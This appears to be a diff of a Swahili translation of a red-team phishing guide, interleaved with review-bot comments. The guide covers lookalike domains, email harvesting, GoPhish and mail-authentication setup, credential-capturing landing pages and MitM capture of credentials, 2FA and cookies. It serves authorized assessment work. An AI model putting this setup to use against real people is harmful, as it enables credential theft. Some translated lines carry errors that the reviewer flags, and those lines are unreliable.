1. **Buy the domain** you are going to use for the phishing assessment
2. **Configure the email service** related records (SPF, DMARC, DKIM, rDNS)
3. Sanidi VPS na **gophish**
3. Andaa campaign
1. Andaa **email template**
2. Andaa **web page** ya kuiba credentials
3. Configure the VPS with **gophish**
3. Prepare the campaign
1. Prepare the **email template**
2. Prepare the **web page** to steal the credentials
4. Launch the campaign!
## Generate similar domain names or buy a trusted domain
### Mbinu za mabadiliko ya domain
### Domain Name Variation Techniques
- **Keyword**: Jina la domain linajumuisha keyword muhimu la domain ya asili (mfano, zelster.com-management.com).
- **hypened subdomain**: Badilisha dot kwa hyphen ya subdomain (mfano, www-zelster.com).
- **New TLD**: Ipi domain ile ile ukitumia New TLD (mfano, zelster.org)
- **Homoglyph**: Inabadilisha herufi katika jina la domain kwa herufi zinazofanana kwa muonekano (mfano, zelfser.com).
- **Keyword**: Jina la domain linajumuisha neno muhimu la domain ya asili (mfano, zelster.com-management.com).
- **hypened subdomain**: Badilisha **dot kwa hyphen** katika subdomain (mfano, www-zelster.com).
- **New TLD**: Tumia domain ile ile lakini na **TLD mpya** (mfano, zelster.org)
- **Homoglyph**: Inabadilisha herufi katika jina la domain kwa **herufi zinazofanana kwa muonekano** (mfano, zelfser.com).
{{#ref}}
homograph-attacks.md
{{#endref}}
- **Transposition:** Inabadilisha nafasi za herufi mbili ndani ya jina la domain (mfano, zelsetr.com).
- **Singularization/Pluralization**: Inaongeza au kuondoa "s" mwishoni mwa jina la domain (mfano, zeltsers.com).
- **Transposition:** Inabadilisha **nchi mbili za herufi** ndani ya jina la domain (mfano, zelsetr.com).
- **Singularization/Pluralization**: Inaongeza au kuondoa “s” mwishoni mwa jina la domain (mfano, zeltsers.com).
- **Omission**: Inaondoa moja ya herufi kutoka jina la domain (mfano, zelser.com).
- **Repetition:** Inarudia moja ya herufi ndani ya jina la domain (mfano, zeltsser.com).
- **Replacement**: Kama homoglyph lakini isiyo na stealth nyingi. Inabadilisha moja ya herufi katika jina la domain, labda kwa herufi ambayo iko karibu kwenye keyboard (mfano, zektser.com).
- **Subdomained**: Ingiza dot ndani ya jina la domain (mfano, ze.lster.com).
- **Insertion**: Inaingiza herufi katika jina la domain (mfano, zerltser.com).
- **Missing dot**: Ambatanisha TLD kwa jina la domain. (mfano, zelstercom.com)
- **Repetition:** Inarudia moja ya herufi kwenye jina la domain (mfano, zeltsser.com).
- **Replacement**: Kama homoglyph lakini isiyo ya kimkakati. Inabadilisha moja ya herufi kwenye jina la domain, labda kwa herufi iliyo karibu kwenye keyboard (mfano, zektser.com).
- **Subdomained**: Weka **dot** ndani ya jina la domain (mfano, ze.lster.com).
- **Insertion**: Inaingiza herufi ndani ya jina la domain (mfano, zerltser.com).
- **Missing dot**: Ambatisha TLD kwenye jina la domain. (mfano, zelstercom.com)
**Automatic Tools**
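Review bot: `Inabadilisha nchi mbili za herufi ndani ya jina la domain` is a regression: `nchi` means "countries", and the replaced line `Inabadilisha nafasi za herufi mbili` correctly described swapping the positions of two letters. Likewise `Kama homoglyph lakini isiyo ya kimkakati` ("but not strategic") loses the source meaning "less stealthy" that the replaced `isiyo na stealth nyingi` carried. The `hypened subdomain` bullet keeps the upstream English typo in both versions; if the Swahili file is being touched anyway, `hyphenated subdomain` would be worth correcting.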
@ -52,25 +52,25 @@ homograph-attacks.md
### Bitflipping
Kuna uwezekano kwamba moja ya bits zilizohifadhiwa au zinazotumwa inaweza kupinduliwa kiotomatiki kutokana na sababu mbalimbali kama solar flares, cosmic rays, au makosa ya hardware.
Kuna uwezekano kwamba baadhi ya bits zilizohifadhiwa au zinazosafirishwa zinaweza kugeuka moja kwa moja kutokana na sababu mbalimbali kama solar flares, cosmic rays, au hitilafu za hardware.
Wakati dhana hii inapotumika kwa maombi ya DNS, inawezekana kwamba domain iliyopokelewa na DNS server si ile ile iliyokuwa imeombwa awali.
Wakati dhana hii inatumika kwa maombi ya DNS, inawezekana kwamba domain iliyopokelewa na server ya DNS sio ile ile iliyombwa awali.
Kwa mfano, mabadiliko ya bit moja kwenye domain "windows.com" yanaweza kuibadilisha kuwa "windnws.com."
Kwa mfano, mabadiliko ya bit moja katika domain "windows.com" yanaweza kuibadilisha kuwa "windnws.com."
Attackers wanaweza kuchukua faida ya hili kwa kusajili domains nyingi za bit-flipping zinazofanana na domain ya victim. Kusudio lao ni kupeleka watumiaji halali kwenye infrastructure yao.
Attackers wanaweza **kuitumia hali hii kwa kusajili multiple bit-flipping domains** zinazofanana na domain ya mjeruhi. Kusudi lao ni kupitisha watumiaji halali kwa infrastructure yao.
Kwa taarifa zaidi soma [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
Kwa maelezo zaidi soma [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
### Nunua domain yenye kuaminika
### Buy a trusted domain
Unaweza kutafuta kwenye [https://www.expireddomains.net/](https://www.expireddomains.net) domain iliyokwisha muda ambayo unaweza kutumia.\
Ili kuhakikisha kwamba expired domain unayopanga kununua tayari ina SEO nzuri unaweza kuangalia jinsi ilivyokatagoriwa katika:
Unaweza kutafuta kwenye [https://www.expireddomains.net/](https://www.expireddomains.net) domain iliyokwisha kuisha ambayo unaweza kununua.\
Ili kuhakikisha kuwa expired domain utakayenunua **inamiliki SEO nzuri** tayari unaweza kuangalia jinsi ilivyoainishwa katika:
- [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
- [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
## Kugundua Emails
## Discovering Emails
- [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
- [https://phonebook.cz/](https://phonebook.cz) (100% free)
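Review bot: `mjeruhi` in `domain ya mjeruhi` means "an injured person"; the standard term for a pentest victim is `mwathiriwa`, and the replaced line simply kept `victim`, which was clearer. Also `iliyombwa` should be `iliyoombwa`, and `domain iliyokwisha kuisha` is redundant ("expired expired"); `domain iliyoisha muda` matches the `expired domain` wording used elsewhere in the section.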
@ -78,25 +78,25 @@ Ili kuhakikisha kwamba expired domain unayopanga kununua tayari ina SEO nzuri un
- [https://hunter.io/](https://hunter.io)
- [https://anymailfinder.com/](https://anymailfinder.com)
Ili kugundua zaidi anwani za email halali au kuthibitisha zile ulizogundua tayari unaweza kuangalia kama unaweza ku-brute-force smtp servers za victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
Zaidi ya hayo, usisahau kwamba ikiwa watumiaji wanatumia any web portal kufikia mails zao, unaweza kuangalia kama ni vunja kwa username brute force, na kutumia udhaifu huo ikiwa inawezekana.
Ili **discover more** valid email addresses au **verify the ones** tayari umevumbua unaweza kuangalia kama unaweza brute-force smtp servers za mjeruhi. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
Zaidi ya hayo, usisahau kwamba ikiwa watumiaji wanatumia **any web portal to access their mails**, unaweza kuangalia kama iko vulnerable kwa **username brute force**, na kufungua mdudu huo ikiwa inawezekana.
## Configuring GoPhish
### Installation
### Ufungaji
Unaweza kupakua kutoka [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Download na decompress ndani ya `/opt/gophish` na uendeshe `/opt/gophish/gophish`\
Utapewa password kwa admin user kwenye port 3333 katika output. Kwa hiyo, ingia kwenye port hiyo na tumia yale credentials kubadilisha admin password. Unaweza kuhitaji ku-tunnel port hiyo hadi local:
Download and decompress it inside `/opt/gophish` and execute `/opt/gophish/gophish`\
Utapewa password ya user admin kwenye port 3333 kwenye output. Kwa hiyo, pata access kwenye port hiyo na tumia credentials hizo kubadilisha password ya admin. Huenda ukahitaji ku-tunnel port hiyo kwa local:
```bash
ssh -L 3333:127.0.0.1:3333 <user>@<ip>
```
### Usanidi
**Usanidi wa cheti la TLS**
**Usanidi wa cheti cha TLS**
Kabla ya hatua hii unapaswa kuwa tayari umenunua kikoa utakayotumia, na lazima kiwe kimeelekezwa kwenye IP ya VPS ambapo unasanidi gophish.
Kabla ya hatua hii unapaswa kuwa **tayari umenunua kikoa** utakachotumia na lazima **kimeelekezwa** kwa **IP ya VPS** ambapo unasanidi **gophish**.
```bash
DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
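Review bot: the new line "na kufungua mdudu huo ikiwa inawezekana" is a regression against the old "na kutumia udhaifu huo ikiwa inawezekana": "to exploit that vulnerability" became "to open that bug", which no longer describes the technique. Restore the old wording. Separately, this hunk's context line `wget https://dl.eff.org/certbot-auto` fetches the deprecated `certbot-auto` wrapper, which EFF no longer maintains; the translation reproduces it faithfully, but a follow-up should switch the instructions to the distribution's `certbot` package (for example `apt-get install certbot`) so the TLS step keeps working.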
@ -112,24 +112,24 @@ mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt
```
**Usanidi wa barua pepe**
**Usanidi wa barua**
Anza kusakinisha: `apt-get install postfix`
Kisha ongeza domain kwenye faili zifuatazo:
Kisha ongeza jina la kikoa kwenye faili zifuatazo:
- **/etc/postfix/virtual_domains**
- **/etc/postfix/transport**
- **/etc/postfix/virtual_regexp**
**Pia badilisha thamani za vigezo vifuatavyo ndani ya /etc/postfix/main.cf**
**Badilisha pia thamani za vigezo vifuatavyo ndani ya /etc/postfix/main.cf**
`myhostname = <domain>`\
`mydestination = $myhostname, <domain>, localhost.com, localhost`
Mwisho, badilisha mafaili **`/etc/hostname`** na **`/etc/mailname`** kwa jina lako la domain na **anzisha upya VPS yako.**
Mwisho badilisha faili **`/etc/hostname`** na **`/etc/mailname`** kwa jina la kikoa chako na anzisha upya VPS yako.
Sasa, tengeneza **DNS A record** ya `mail.<domain>` inayoelekeza kwa **ip address** ya VPS na rekodi ya **DNS MX** inayoelekeza kwa `mail.<domain>`
Sasa, tengeneza rekodi ya **DNS A record** ya `mail.<domain>` ikielekeza kwa **anwani ya IP** ya VPS na rekodi ya **DNS MX** ikielekeza `mail.<domain>`
Sasa tujaribu kutuma barua pepe:
```bash
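Review bot: the Postfix line `mydestination = $myhostname, <domain>, localhost.com, localhost` lists `localhost.com`, which is a real public domain rather than a loopback alias; it is harmless for a throwaway phishing VPS but it tells Postfix to accept mail for someone else's domain as local. The conventional value is `localhost.$mydomain` (or simply drop that entry). On the translation side, "domain" is rendered as "kikoa" in "tayari umenunua kikoa", "jina la kikoa" and "/etc/mailname kwa jina la kikoa chako", but as "domain" in "rekodi ya DNS A record ya mail.<domain>" and "mail server na domain"; choose one term for the file.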
@ -138,8 +138,8 @@ echo "This is the body of the email" | mail -s "This is the subject line" test@e
```
**Usanidi wa Gophish**
Simamisha gophish na tufanye usanidi wake.\
Badilisha `/opt/gophish/config.json` kuwa ifuatayo (kumbuka matumizi ya https):
Simamisha utekelezaji wa Gophish na tufanye usanidi wake.\
Badilisha `/opt/gophish/config.json` kuwa ifuatayo (tazama matumizi ya https):
```bash
{
"admin_server": {
@ -164,9 +164,9 @@ Badilisha `/opt/gophish/config.json` kuwa ifuatayo (kumbuka matumizi ya https):
}
}
```
**Sanidi huduma ya gophish**
**Sanidi gophish service**
Ili kuunda huduma ya gophish ili iweze kuanzishwa kiotomatiki na kusimamiwa kama huduma, unaweza kuunda faili `/etc/init.d/gophish` yenye maudhui yafuatayo:
Ili kuunda gophish service ili iweze kuanzishwa kiotomatiki na kusimamiwa kama service, unaweza kuunda faili `/etc/init.d/gophish` yenye yaliyomo yafuatayo:
```bash
#!/bin/bash
# /etc/init.d/gophish
@ -213,7 +213,7 @@ case $1 in
start|stop|status) "$1" ;;
esac
```
Maliza kusanidi huduma na kuangalia inavyofanya:
Maliza kusanidi huduma na kuikagua kwa kufanya:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
@ -224,60 +224,60 @@ service gophish status
ss -l | grep "3333\|443"
service gophish stop
```
## Kusanidi mail server na domain
## Kusanidi server ya barua na domain
### Subiri & kuwa halali
Kadri domain inavyokuwa ya zamani, ndivyo uwezekano wa kugunduliwa kama spam unavyopungua. Kwa hivyo unapaswa kusubiri muda mrefu iwezekanavyo (angalau 1week) kabla ya phishing assessment. Zaidi ya hayo, ukiongeza ukurasa kuhusu sekta yenye sifa, sifa utakayopata itakuwa bora.
Kadiri domain inavyozeeka, ndivyo uwezekano wake wa kushikiliwa kama spam unavyopungua. Kwa hivyo unapaswa kusubiri muda mwingi iwezekanavyo (angalau wiki 1) kabla ya tathmini ya phishing. Zaidi ya hayo, ikiwa utaweka ukurasa kuhusu sekta yenye sifa nzuri, sifa utakazopata itakuwa bora.
Kumbuka kwamba hata ukilazimika kusubiri wiki unaweza kumaliza kusanidi kila kitu sasa.
Kumbuka kwamba hata kama unapaswa kusubiri wiki moja, unaweza kumaliza kusanidi kila kitu sasa.
### Sanidi Reverse DNS (rDNS) record
### Sanidi rekodi ya Reverse DNS (rDNS)
Weka rekodi ya rDNS (PTR) inayotatua IP address ya VPS kwa jina la domain.
Weka rekodi ya rDNS (PTR) inayotatua anwani ya IP ya VPS kwa jina la domain.
### Rekodi ya Sender Policy Framework (SPF)
Unapaswa **kusanidi SPF record kwa domain mpya**. Ikiwa haujui SPF record ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
Unapaswa **kusanidi rekodi ya SPF kwa domain mpya**. Ikiwa haujui SPF ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
Unaweza kutumia [https://www.spfwizard.net/](https://www.spfwizard.net) kuunda SPF policy yako (tumia IP ya mashine ya VPS)
Unaweza kutumia [https://www.spfwizard.net/](https://www.spfwizard.net) kutengeneza sera yako ya SPF (tumia anwani ya IP ya mashine ya VPS)
![](<../../images/image (1037).png>)
Hili ndilo maudhui yanayopaswa kuwekwa ndani ya TXT record ndani ya domain:
Hii ndiyo yaliyomo yanayotakiwa kuwekwa ndani ya rekodi ya TXT katika domain:
```bash
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
### Uthibitishaji wa Ujumbe Unaotegemea Domain, Ripoti & Utii (DMARC) Rekodi
### Rekodi ya Uthibitishaji wa Ujumbe Unaotegemea Domain, Kuripoti & Utii (DMARC)
Lazima **usanidi rekodi ya DMARC kwa domain mpya**. Ikiwa haujui ni rekodi ya DMARC ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
Lazima **usanidi rekodi ya DMARC kwa domain mpya**. Ikiwa hujui rekodi ya DMARC ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
Unahitaji kuunda rekodi mpya ya DNS TXT ikielekeza hostname `_dmarc.<domain>` na yaliyomo yafuatayo:
Unapaswa kuunda rekodi mpya ya DNS TXT inayolenga jina la mwenyeji `_dmarc.<domain>` na maudhui yafuatayo:
```bash
v=DMARC1; p=none
```
### DomainKeys Identified Mail (DKIM)
Unapaswa **kusanidi DKIM kwa domain mpya**. Ikiwa haujui ni rekodi ya DMARC ni nini [**soma ukurasa huu**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
Lazima **usanidi DKIM kwa domain mpya**. Ikiwa haujui rekodi ya DMARC ni nini [**soma ukurasa huu**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
> [!TIP]
> Unahitaji kuunganisha thamani zote mbili za B64 ambazo ufunguo wa DKIM unazozalisha:
> Unahitaji kuunganisha thamani zote mbili za B64 ambazo DKIM key inazalisha:
>
> ```
> v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB
> ```
### Test your email configuration score
### Pima alama ya usanidi wa barua pepe yako
Unaweza kufanya hivyo kwa kutumia [https://www.mail-tester.com/](https://www.mail-tester.com/)\
Fungua ukurasa huo na tuma barua pepe kwa anwani watakayo kutoa:
Unaweza kufanya hivyo kwa kutumia [https://www.mail-tester.com/](https://www.mail-tester.com)\
Ingia tu kwenye ukurasa na utume barua pepe kwa anwani watakayokupa:
```bash
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
```
Unaweza pia **kukagua usanidi wako wa barua pepe** kwa kutuma barua pepe kwa `check-auth@verifier.port25.com` na **kusoma majibu** (kwa hili utahitaji **kufungua** port **25** na kuona majibu katika faili _/var/mail/root_ ikiwa utatuma barua pepe a kama root).\
Angalia kwamba unapitisha vipimo vyote:
Unaweza pia **kagua usanidi wa barua pepe yako** kwa kutuma barua pepe kwa `check-auth@verifier.port25.com` na **kusoma jibu** (kwa hili utahitaji **kufungua** port **25** na kuona jibu katika faili _/var/mail/root_ ikiwa utatuma barua pepe kama root).\
Hakikisha kwamba unapitisha mitihani yote:
```bash
==========================================================
Summary of Results
@ -288,40 +288,40 @@ DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham
```
Unaweza pia kutuma **ujumbe kwa akaunti ya Gmail unayodhibiti**, na ukague **vichwa vya barua pepe** katika inbox yako ya Gmail, `dkim=pass` inapaswa kuwepo katika uwanja wa kichwa `Authentication-Results`.
Unaweza pia kutuma **ujumbe kwa Gmail unayodhibiti**, na kuangalia **emails headers** kwenye inbox yako ya Gmail, `dkim=pass` inapaswa kuwepo katika `Authentication-Results` header field.
```
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
```
### Kuondolewa kwenye Orodha Nyeusi ya Spamhouse
### Kuondoa kutoka Spamhouse Blacklist
Ukurasa [www.mail-tester.com](https://www.mail-tester.com) unaweza kukuonyesha kama domain yako inazuiliwa na spamhouse. Unaweza kuomba domain/IP yako iondolewe kwa: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
Tovuti [www.mail-tester.com](https://www.mail-tester.com) inaweza kukuonyesha ikiwa domain yako inazuiawa na Spamhouse. Unaweza kuomba domain/IP yako iondolewe kwenye: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
### Kuondolewa kwenye Orodha Nyeusi ya Microsoft
### Kuondoa kutoka Microsoft Blacklist
Unaweza kuomba domain/IP yako iondolewe kwa [https://sender.office.com/](https://sender.office.com).
Unaweza kuomba domain/IP yako iondolewe kwenye [https://sender.office.com/](https://sender.office.com).
## Unda & Anzisha Kampeni ya GoPhish
### Profaili ya Kutuma
- Weka **jina la utambuzi** la profaili ya mtumaji
- Amua kutoka kwa akaunti ipi utakayotumia kutuma phishing emails. Mapendekezo: _noreply, support, servicedesk, salesforce..._
- Unaweza kuacha username na password wazi, lakini hakikisha umechagua Ignore Certificate Errors
- Weka baadhi ya **jina la kutambua** profaili ya mtumaji
- Amua kutoka akaunti gani utatumia kutuma barua pepe za phishing. Mapendekezo: _noreply, support, servicedesk, salesforce..._
- Unaweza kuacha jina la mtumiaji na nenosiri tupu, lakini hakikisha umeweka alama kwenye Ignore Certificate Errors
![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>)
> [!TIP]
> Inashauriwa kutumia kipengele cha "**Send Test Email**" ili kujaribu kwamba kila kitu kinafanya kazi.\
> Ninapendekeza **kutuma barua za jaribio kwa anwani za 10min mails** ili kuepuka kuwekwa kwenye orodha nyeusi wakati wa majaribio.
> Inashauriwa kutumia kipengee cha "**Send Test Email**" kujaribu kwamba kila kitu kinafanya kazi.\
> Ningependekeza **kutuma barua za mtihani kwa anwani za 10min mails** ili kuepuka kuingia kwenye blacklist wakati wa kufanya majaribio.
### Kiolezo cha Barua Pepe
### Templeti ya Barua Pepe
- Weka **jina la utambuzi** la kiolezo
- Kisha andika **subject** (hakuna kitu cha kigeni, tu kile unachoweza kutarajia kusoma katika barua pepe ya kawaida)
- Weka baadhi ya **jina la kutambua** templeti
- Kisha andika **subject** (si kitu cha kushangaza, tu kitu ungetarajia kusoma katika barua pepe ya kawaida)
- Hakikisha umechagua "**Add Tracking Image**"
- Andika **kiolezo cha barua pepe** (unaweza kutumia variables kama katika mfano ufuatao):
- Andika **email template** (unaweza kutumia vigezo kama katika mfano ufuatao):
```html
<html>
<head>
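Review bot: the DKIM paragraph "Lazima usanidi DKIM kwa domain mpya. Ikiwa haujui rekodi ya DMARC ni nini" still says DMARC where it should say DKIM; the old line has the same copy-paste error, and since the link target is `#dkim` the sentence should read "Ikiwa haujui DKIM ni nini". Two more points in this hunk: the tip says both B64 halves of the DKIM key must be joined, yet the example record still contains the `" "` break (`...TmG/Y2bBGoEgeE+...xj" "Y9N/Dt3+...`) that `opendkim-genkey` emits for the 255-byte TXT limit, so either join them in the example or say that the quotes are what must be removed; and the headings "Kuondoa kutoka Spamhouse Blacklist" and "inazuiawa na Spamhouse" misspell Spamhaus (the URL on the same line is `spamhaus.org`) and "inazuiawa" should be "inazuiwa".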
@ -340,11 +340,11 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
</body>
</html>
```
Kumbuka kwamba **ili kuongeza uhalali wa email**, inashauriwa kutumia baadhi ya saini kutoka kwenye email ya mteja. Mapendekezo:
Kumbuka kwamba **ili kuongeza uhalali wa barua pepe**, inapendekezwa kutumia baadhi ya sahihi (signature) kutoka kwa barua pepe ya mteja. Mapendekezo:
- Tuma email kwa **anwani isiyokuwepo** na angalia kama jibu lina saini yoyote.
- Tafuta **emails za umma** kama info@ex.com au press@ex.com au public@ex.com na utume email kwao na usubiri jibu.
- Jaribu kuwasiliana na **email sahihi iliyogunduliwa** na subiri jibu
- Tuma barua pepe kwa **anwani isiyopo** na angalia kama jibu lina sahihi yoyote.
- Tafuta **barua pepe za umma** kama info@ex.com au press@ex.com au public@ex.com na utumie barua pepe na subiri jibu.
- Jaribu kuwasiliana na **barua pepe halali ulizogundua** na subiri jibu
![](<../../images/image (80).png>)
@ -354,42 +354,42 @@ Kumbuka kwamba **ili kuongeza uhalali wa email**, inashauriwa kutumia baadhi ya
### Landing Page
- Andika **jina**
- **Andika the HTML code** ya ukurasa wa wavuti. Kumbuka kwamba unaweza **ku-import** web pages.
- Mark **Capture Submitted Data** na **Capture Passwords**
- **Andika HTML code** ya ukurasa wa wavuti. Kumbuka unaweza **kuingiza** kurasa za wavuti.
- Chagua **Capture Submitted Data** na **Capture Passwords**
- Weka **redirection**
![](<../../images/image (826).png>)
> [!TIP]
> Kwa kawaida utahitaji kubadilisha code ya HTML ya ukurasa na kufanya majaribio kwa local (labda ukitumia Apache server) **mpaka utakapopendeza matokeo.** Kisha, andika hiyo HTML code kwenye box.
> Kumbuka kwamba ikiwa unahitaji **kutumia static resources** kwa HTML (labda baadhi ya CSS na JS pages) unaweza kuziweka katika _**/opt/gophish/static/endpoint**_ na kisha kuzipata kutoka _**/static/\<filename>**_
> Kwa kawaida utahitaji kubadilisha HTML ya ukurasa na kufanya majaribio pale kwa mtaa (labda ukitumia server ya Apache) **hadi utakapofurahia matokeo.** Kisha, andika HTML hiyo kwenye kisanduku.\
> Kumbuka kwamba ikiwa unahitaji **kutumia rasilimali zisizo za mabadiliko** kwa HTML (labda baadhi ya kurasa za CSS na JS) unaweza kuzihifadhi katika _**/opt/gophish/static/endpoint**_ kisha uzifikishe kutoka _**/static/\<filename>**_
> [!TIP]
> Kwa redirection unaweza **ku-redirect watumiaji kwenye ukurasa halali wa mwanzo** wa mwathiriwa, au ku-redirect kwa _/static/migration.html_ kwa mfano, weka **spinning wheel (**[**https://loading.io/**](https://loading.io)**) kwa sekunde 5 kisha onyesha kuwa mchakato umefanikiwa**.
> Kwa ajili ya redirection unaweza **kupeleka watumiaji kwenye ukurasa mkuu halali** wa mwathiri, au kuwarudisha kwa _/static/migration.html_ kwa mfano, weka **spinning wheel (**[**https://loading.io/**](https://loading.io)**) kwa sekunde 5 kishaonyesha kwamba mchakato ulifanikiwa**.
### Users & Groups
- Weka jina
- **Import the data** (kumbuka kwamba ili kutumia template kwa mfano unahitaji jina la kwanza, jina la mwisho na email address ya kila mtumiaji)
- **Import the data** (kumbuka kwamba ili kutumia template kwa mfano utahitaji firstname, last name na email address ya kila mtumiaji)
![](<../../images/image (163).png>)
### Campaign
Hatimaye, unda kampeni ukichagua jina, email template, landing page, URL, sending profile na group. Kumbuka kwamba URL itakuwa link itakayotumwa kwa waathiriwa
Mwishowe, unda campaign ukichagua jina, email template, landing page, URL, sending profile na group. Kumbuka kwamba URL itakuwa link itakayotumwa kwa waathiriwa
Kumbuka pia kwamba **Sending Profile inaruhusu kutuma test email ili kuona jinsi email ya hatima itakavyoonekana**:
Kumbuka kwamba **Sending Profile** inaruhusu kutuma barua pepe ya mtihani kuona jinsi barua pepe ya mwisho ya phishing itakavyoonekana:
![](<../../images/image (192).png>)
> [!TIP]
> Napendekeza **kutuma test emails kwa anwani za 10min mails** ili kuepuka kuorodheshwa kwenye blacklist wakati wa kufanya majaribio.
> Ningependekeza **kutuma barua pepe za mtihani kwa anwani za 10min mails** ili kuepuka kusukwa kwenye blacklist wakati wa kufanya majaribio.
Mara kila kitu kikiwa tayari, anza kampeni tu!
Mara kila kitu kiko tayari, anzisha tu campaign!
## Website Cloning
Ikiwa kwa sababu yoyote ungependa kukopa tovuti angalia ukurasa ufuatao:
Ikiwa kwa sababu yoyote unataka kunakili tovuti angalia ukurasa ufuatao:
{{#ref}}
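Review bot: "rasilimali zisizo za mabadiliko" in the tip "ikiwa unahitaji kutumia rasilimali zisizo za mabadiliko kwa HTML (labda baadhi ya kurasa za CSS na JS)" is an awkward calque of "static resources"; the surrounding text already keeps English technical terms, so "static resources" or "faili za static" reads better and matches the `/static/<filename>` path the sentence points at. Also, "kuepuka kusukwa kwenye blacklist" uses "kusukwa" (to be woven); the intended word is "kuorodheshwa kwenye blacklist", which the old line had.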
@ -398,8 +398,8 @@ clone-a-website.md
## Backdoored Documents & Files
Katika baadhi ya tathmini za phishing (hasa kwa Red Teams) utataka pia **kutuma files zenye aina fulani ya backdoor** (labda C2 au labda kitu ambacho kitachochea authentication).\
Angalia ukurasa ufuatao kwa baadhi ya mifano:
Katika baadhi ya tathmini za phishing (hasa kwa Red Teams) utataka pia **kutuma faili zenye aina fulani ya backdoor** (labda C2 au labda kitu ambacho kitachochea uthibitisho).\
Tazama ukurasa ufuatao kwa baadhi ya mifano:
{{#ref}}
@ -410,53 +410,53 @@ phishing-documents.md
### Via Proxy MitM
Shambulio lililotangulia ni changamto kwani unafanana na tovuti halisi na kukusanya taarifa zilizowekwa na mtumiaji. Kwa bahati mbaya, ikiwa mtumiaji hakuweka password sahihi au ikiwa application uliyofanya clone imewekwa na 2FA, **taarifa hizi hazitatumika kukufanya uende kama mtumiaji aliyefumwa**.
Shambulio lililotangulia ni janja kwa kuwa unalifanya kuwa tovuti halisi na kukusanya taarifa zilizopakiwa na mtumiaji. Kwa bahati mbaya, kama mtumiaji hakuweka nenosiri sahihi au ikiwa application uliyofanyia fake imewekwa na 2FA, **taarifa hizi hazitatumika kukufanya ujifikirie kama mtumiaji aliyepigwa wizi**.
Hapa ndipo zana kama [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) na [**muraena**](https://github.com/muraenateam/muraena) zinapoweza kusaidia. Zana hizi zitakuwezesha kuzalisha shambulio la MitM. Kwa msingi, shambulio hufanya kazi kwa njia ifuatayo:
Hapa ndio ambapo zana kama [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) na [**muraena**](https://github.com/muraenateam/muraena) zinakuwa muhimu. Zana hizi zitakuwezesha kuanzisha shambulio la MitM. Kwa msingi, shambulio linafanya hivi:
1. Unachanganya fomu ya **login** ya ukurasa halisi.
2. Mtumiaji **anatuma** credential zake kwenye ukurasa wako wa fake na zana inazituma kwenye ukurasa halisi, **ikikagua kama credentials zinafanya kazi**.
3. Ikiwa akaunti imewekwa na **2FA**, ukurasa wa MitM utaomba 2FA na mara mtumiaji **akitolea** itaambatishwa kwenye ukurasa halisi.
4. Mara mtumiaji anapothibitishwa wewe (kama mshambulizi) utakuwa ume **kamata credentials, 2FA, cookie na taarifa zote** za kila mwingiliano wakati zana ikifanya MitM.
1. Unafanya **impersonate** fomu ya login ya ukurasa halisi.
